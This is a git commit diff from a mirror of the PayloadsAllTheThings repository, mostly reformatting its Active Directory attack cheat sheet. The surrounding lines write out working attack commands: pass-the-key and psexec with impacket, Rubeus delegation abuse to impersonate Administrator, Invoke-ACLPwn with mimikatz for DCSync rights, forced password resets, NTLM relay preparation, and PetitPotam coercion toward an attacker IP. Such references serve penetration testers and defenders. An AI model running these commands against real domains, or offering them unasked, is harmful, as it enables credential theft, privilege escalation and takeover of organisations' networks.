mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-13 14:52:53 +00:00
Update Active Directory Attack.md
This commit is contained in:
parent
8045496946
commit
09b1b8984a
1 changed files with 20 additions and 21 deletions
|
@ -1596,7 +1596,7 @@ C:\Rubeus> john --format=krb5asrep --wordlist=passwords_kerb.txt hashes.asreproa
|
||||||
Requirements :
|
Requirements :
|
||||||
* Domain Controller on (at least) Windows Server 2016
|
* Domain Controller on (at least) Windows Server 2016
|
||||||
* PKINIT Kerberos authentication
|
* PKINIT Kerberos authentication
|
||||||
* An account with the delegated rights to write to the msDS-KeyCredentialLink attribute of the target object
|
* An account with the delegated rights to write to the `msDS-KeyCredentialLink` attribute of the target object
|
||||||
|
|
||||||
Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
|
Add **Key Credentials** to the attribute `msDS-KeyCredentialLink` of the target user/computer object and then perform Kerberos authentication as that account using PKINIT to obtain a TGT for that user.
|
||||||
|
|
||||||
|
@ -1667,17 +1667,17 @@ In this technique, instead of passing the hash directly, we use the NTLM hash of
|
||||||
|
|
||||||
#### Using impacket
|
#### Using impacket
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
root@kali:impacket-examples$ python ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
|
root@kali:~$ python ./getTGT.py -hashes ":1a59bd44fe5bec39c44c8cd3524dee" lab.ropnop.com
|
||||||
root@kali:impacket-examples$ export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
|
root@kali:~$ export KRB5CCNAME="/root/impacket-examples/velociraptor.ccache"
|
||||||
root@kali:impacket-examples$ python psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
|
root@kali:~$ python3 psexec.py "jurassic.park/velociraptor@labwws02.jurassic.park" -k -no-pass
|
||||||
|
|
||||||
also with the AES Key if you have it
|
# also with the AES Key if you have it
|
||||||
root@kali:impacket-examples$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
root@kali:~$ ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
|
||||||
|
|
||||||
ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
root@kali:~$ ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
|
||||||
kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
root@kali:~$ kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
|
||||||
klist
|
root@kali:~$ klist
|
||||||
```
|
```
|
||||||
|
|
||||||
#### Using Rubeus
|
#### Using Rubeus
|
||||||
|
@ -1770,10 +1770,10 @@ NTLMv1 and NTLMv2 can be relayed to connect to another machine.
|
||||||
|
|
||||||
| Hash | Hashcat | Attack method |
|
| Hash | Hashcat | Attack method |
|
||||||
|---|---|---|
|
|---|---|---|
|
||||||
| LM | 3000 | crack/pass the hash |
|
| LM | `3000` | crack/pass the hash |
|
||||||
| NTLM/NTHash | 1000 | crack/pass the hash |
|
| NTLM/NTHash | `1000` | crack/pass the hash |
|
||||||
| NTLMv1/Net-NTLMv1 | 5500 | crack/relay attack |
|
| NTLMv1/Net-NTLMv1 | `5500` | crack/relay attack |
|
||||||
| NTLMv2/Net-NTLMv2 | 5600 | crack/relay attack |
|
| NTLMv2/Net-NTLMv2 | `5600` | crack/relay attack |
|
||||||
|
|
||||||
Crack the hash with `hashcat`.
|
Crack the hash with `hashcat`.
|
||||||
|
|
||||||
|
@ -1846,7 +1846,7 @@ If a machine has `SMB signing`:`disabled`, it is possible to use Responder with
|
||||||
|
|
||||||
#### SMB Signing Disabled and IPv6
|
#### SMB Signing Disabled and IPv6
|
||||||
|
|
||||||
Since MS16-077 the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
Since [MS16-077](https://docs.microsoft.com/en-us/security-updates/securitybulletins/2016/ms16-077) the location of the WPAD file is no longer requested via broadcast protocols, but only via DNS.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
crackmapexec smb $hosts --gen-relay-list relay.txt
|
crackmapexec smb $hosts --gen-relay-list relay.txt
|
||||||
|
@ -2068,7 +2068,6 @@ If you do not want modified ACLs to be overwritten every hour, you should change
|
||||||
|
|
||||||
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
> The AdminCount attribute is set to `1` automatically when a user is assigned to any privileged group, but it is never automatically unset when the user is removed from these group(s).
|
||||||
|
|
||||||
|
|
||||||
Find users with `AdminCount=1`.
|
Find users with `AdminCount=1`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -2194,7 +2193,7 @@ NOTE: To not alert the user the payload should hide its own process window and s
|
||||||
|
|
||||||
#### WriteDACL
|
#### WriteDACL
|
||||||
|
|
||||||
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
|
To abuse `WriteDacl` to a domain object, you may grant yourself the DcSync privileges. It is possible to add any given account as a replication partner of the domain by applying the following extended rights Replicating Directory Changes/Replicating Directory Changes All. [Invoke-ACLPwn](https://github.com/fox-it/Invoke-ACLPwn) is a tool that automates the discovery and pwnage of ACLs in Active Directory that are unsafe configured : `./Invoke-ACL.ps1 -SharpHoundLocation .\sharphound.exe -mimiKatzLocation .\mimikatz.exe -Username 'user1' -Domain 'domain.local' -Password 'Welcome01!'`
|
||||||
|
|
||||||
* WriteDACL on Domain
|
* WriteDACL on Domain
|
||||||
```powershell
|
```powershell
|
||||||
|
@ -2247,7 +2246,7 @@ ConvertFrom-ADManagedPasswordBlob $mp
|
||||||
#### ForceChangePassword
|
#### ForceChangePassword
|
||||||
|
|
||||||
An attacker can change the password of the user this ACE applies to.
|
An attacker can change the password of the user this ACE applies to.
|
||||||
This can be achieved with Set-DomainUserPassword (PowerView module).
|
This can be achieved with `Set-DomainUserPassword` (PowerView module).
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
|
||||||
|
@ -2565,7 +2564,7 @@ Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HA
|
||||||
|
|
||||||
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
|
||||||
|
|
||||||
```powershell
|
```bash
|
||||||
# Coerce the callback
|
# Coerce the callback
|
||||||
git clone https://github.com/topotam/PetitPotam
|
git clone https://github.com/topotam/PetitPotam
|
||||||
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
|
||||||
|
@ -2593,11 +2592,11 @@ $ Get-DomainComputer previous_result | select -exp msds-AllowedToDelegateTo
|
||||||
#### Exploit the Constrained Delegation
|
#### Exploit the Constrained Delegation
|
||||||
|
|
||||||
* Impacket
|
* Impacket
|
||||||
```ps1
|
```bash
|
||||||
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
$ getST.py -spn HOST/SQL01.DOMAIN 'DOMAIN/user:password' -impersonate Administrator -dc-ip 10.10.10.10
|
||||||
```
|
```
|
||||||
* Rubeus
|
* Rubeus
|
||||||
```ps1
|
```bash
|
||||||
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
$ ./Rubeus.exe tgtdeleg /nowrap # this ticket can be used with /ticket:...
|
||||||
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
$ ./Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:cifs/srv01.domain.com /ptt
|
||||||
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
$ ./Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt
|
||||||
|
|
Loading…
Reference in a new issue